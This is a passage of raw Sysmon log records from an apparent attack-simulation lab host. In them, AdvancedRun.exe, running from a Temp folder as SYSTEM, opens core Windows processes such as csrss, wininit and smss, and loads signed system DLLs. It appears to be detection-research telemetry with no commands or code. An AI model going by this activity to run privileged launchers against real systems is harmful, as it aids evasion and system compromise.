INI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008559Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008558Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008557Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008556Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000004008555Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft 
WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004008554Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008483Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:43.097{834264DD-DB11-61EA-9500-000000002702}4285040C:\Windows\Explorer.EXE{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008482Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:43.097{834264DD-DB11-61EA-9500-000000002702}4284864C:\Windows\Explorer.EXE{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008481Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:43.097{834264DD-DB11-61EA-9500-000000002702}4285040C:\Windows\Explorer.EXE{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008480Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:43.097{834264DD-DB11-61EA-9500-000000002702}4285040C:\Windows\Explorer.EXE{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008477Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:43.097{834264DD-DB11-61EA-9500-000000002702}4284864C:\Windows\Explorer.EXE{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008476Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:43.097{834264DD-DB11-61EA-9500-000000002702}4284864C:\Windows\Explorer.EXE{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008475Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:43.097{834264DD-DB11-61EA-9500-000000002702}4284864C:\Windows\Explorer.EXE{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008474Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:43.082{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008473Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:43.082{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008472Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:43.066{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62db0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008471Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:43.066{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+62d6c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008470Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:43.066{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62d40|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008469Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:43.066{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 734700x80000000000000004008468Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.941{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Program Files (x86)\Common Files\Microsoft Shared\ink\tiptsf.dll10.0.14393.4169 (rs1_release.210107-1130)Touch Keyboard and Handwriting Panel Text Services FrameworkMicrosoft® Windows® Operating SystemMicrosoft CorporationTipTsf.dllMD5=917E8F9264946341B07DD6F1C2FF06C3,SHA256=5143C7496BD0ADF21693BB68661CD4967826485DE0A51F997309EFE4D86F21D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008467Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:42.941{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A5DBC147158A0FFB44246C9452A1C9E1,SHA256=D7763F384F902F00980FE6A2ED0F254AF0539B66AAABFF64413B0D17606000A9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008466Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.847{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\dwmapi.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft Desktop Window Manager APIMicrosoft® Windows® Operating SystemMicrosoft Corporationdwmapi.dllMD5=F6B687A32ABAE8BE3B02C122B58D952F,SHA256=DF763BDC4348BBEA93375263BF88E0BCD1267C58FC0F6E994F6D778D302DDE85trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008465Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.832{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=7BC54AA66588A3DF7B1448A4493C6663,SHA256=9CB1BA7C092164DAA14E21454606905E294D137AD72158F92A666077D7CF1946trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008464Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.832{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft 
CorporationOLEAUT32.DLLMD5=0D885953D657434CA5015545A364BDB9,SHA256=1D29921E136F84B4CA9F1EBD646CFFF4571EA805A6CC5BC1F7C7784CC3246088trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008463Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.832{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msctf.dll10.0.14393.4530 (rs1_release.210705-0736)MSCTF Server DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationMSCTF.DLLMD5=2BE98799BE75460B5BFC4B7AAE16F1C0,SHA256=79206EE81A33F14D2EEA028AE188923A24C6E0E2FAFF10F2B58F265C69D13CBCtrueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004008462Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.832{834264DD-DAE7-61EA-1700-000000002702}13002268C:\Windows\System32\svchost.exe{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004008461Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:42.832{834264DD-DAE7-61EA-1700-000000002702}13001340C:\Windows\System32\svchost.exe{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004008460Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 